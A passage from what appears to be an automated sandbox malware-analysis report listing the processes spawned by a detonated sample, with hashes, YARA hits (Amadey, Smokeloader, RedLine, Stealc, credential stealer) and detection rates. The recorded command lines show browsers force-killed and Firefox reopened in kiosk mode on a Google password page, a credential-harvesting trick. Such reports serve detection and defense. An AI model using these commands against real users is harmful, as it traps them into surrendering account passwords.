                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                            Start time:15:09:11
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe"
                                                                                                                                                                                                                                            Imagebase:0x220000
                                                                                                                                                                                                                                            File size:828'416 bytes
                                                                                                                                                                                                                                            MD5 hash:9A2CC9D6C6282E7B2A0FF5649A70B0DF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            • Detection: 32%, ReversingLabs
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                            Start time:15:09:11
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                            Start time:15:09:11
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe"
                                                                                                                                                                                                                                            Imagebase:0x220000
                                                                                                                                                                                                                                            File size:828'416 bytes
                                                                                                                                                                                                                                            MD5 hash:9A2CC9D6C6282E7B2A0FF5649A70B0DF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                            Start time:15:09:11
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe"
                                                                                                                                                                                                                                            Imagebase:0x220000
                                                                                                                                                                                                                                            File size:828'416 bytes
                                                                                                                                                                                                                                            MD5 hash:9A2CC9D6C6282E7B2A0FF5649A70B0DF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                            Start time:15:09:19
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe"
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            File size:1'966'080 bytes
                                                                                                                                                                                                                                            MD5 hash:F7A47830F40CC4B6A06D777FAB2F42F9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.3486058612.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.3478917233.0000000000F4D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            • Detection: 54%, ReversingLabs
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                            Start time:15:09:28
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe"
                                                                                                                                                                                                                                            Imagebase:0xc50000
                                                                                                                                                                                                                                            File size:1'858'560 bytes
                                                                                                                                                                                                                                            MD5 hash:2B86AAB9799FDB49D90E8D5C3F773C33
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.3197174045.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.3197230933.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.3190538036.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.3131338677.00000000012CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.3190424295.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.3164980897.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.3164239132.00000000012C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.3190825384.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.3137799586.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.3106209007.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                            Start time:15:09:36
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe"
                                                                                                                                                                                                                                            Imagebase:0xa80000
                                                                                                                                                                                                                                            File size:1'831'936 bytes
                                                                                                                                                                                                                                            MD5 hash:3A76AB70C01DA0F818F89BFE4E904EE3
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.3180012118.0000000000A81000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.3190013417.000000000145E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000003.3122477181.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                            Start time:15:09:41
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe"
                                                                                                                                                                                                                                            Imagebase:0xc50000
                                                                                                                                                                                                                                            File size:1'858'560 bytes
                                                                                                                                                                                                                                            MD5 hash:2B86AAB9799FDB49D90E8D5C3F773C33
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3245722384.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3365772900.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3271234904.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3271575220.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.3365494500.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                            Start time:15:09:44
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe"
                                                                                                                                                                                                                                            Imagebase:0xea0000
                                                                                                                                                                                                                                            File size:973'312 bytes
                                                                                                                                                                                                                                            MD5 hash:3F7BA360C993567431731DD9E8EB6A67
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                            Start time:15:09:45
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                            Imagebase:0x170000
                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                            Start time:15:09:45
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                            Start time:15:09:48
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                            Imagebase:0x170000
                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                            Start time:15:09:48
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                            Start time:15:09:48
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                            Imagebase:0x170000
                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                            Start time:15:09:48
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                            Start time:15:09:48
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                            Imagebase:0x170000
                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                            Start time:15:09:48
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                            Start time:15:09:48
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                            Imagebase:0x170000
                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                            Start time:15:09:48
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                            Start time:15:09:49
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                            Imagebase:0x7ff728280000
                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                            Start time:15:09:49
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                                                                                                                                                                                                                                            Imagebase:0x7ff728280000
                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                            Start time:15:09:49
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                            Imagebase:0x7ff728280000
                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                            Start time:15:09:50
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe"
                                                                                                                                                                                                                                            Imagebase:0xa80000
                                                                                                                                                                                                                                            File size:1'831'936 bytes
                                                                                                                                                                                                                                            MD5 hash:3A76AB70C01DA0F818F89BFE4E904EE3
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001E.00000003.3258280474.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001E.00000002.3351423687.0000000000728000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001E.00000002.3354435913.0000000000A81000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                            Start time:15:09:50
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2352 -parentBuildID 20230927232528 -prefsHandle 2288 -prefMapHandle 2284 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {745b1038-6b91-4698-a3f0-64664cce277e} 1892 "\\.\pipe\gecko-crash-server-pipe.1892" 2149b56f910 socket
                                                                                                                                                                                                                                            Imagebase:0x7ff728280000
                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                            Start time:15:09:54
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exe"
                                                                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                                                                            File size:2'793'472 bytes
                                                                                                                                                                                                                                            MD5 hash:BB21543A1E27325F9EA87BAB89FACF4B
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                            Start time:15:09:54
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4360 -parentBuildID 20230927232528 -prefsHandle 4316 -prefMapHandle 4328 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5763664d-1f38-4c19-9998-65a89666960a} 1892 "\\.\pipe\gecko-crash-server-pipe.1892" 214adcdc110 rdd
                                                                                                                                                                                                                                            Imagebase:0x7ff728280000
                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                            Start time:15:09:58
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe"
                                                                                                                                                                                                                                            Imagebase:0xea0000
                                                                                                                                                                                                                                            File size:973'312 bytes
                                                                                                                                                                                                                                            MD5 hash:3F7BA360C993567431731DD9E8EB6A67
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                            Start time:15:10:01
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                            Imagebase:0x170000
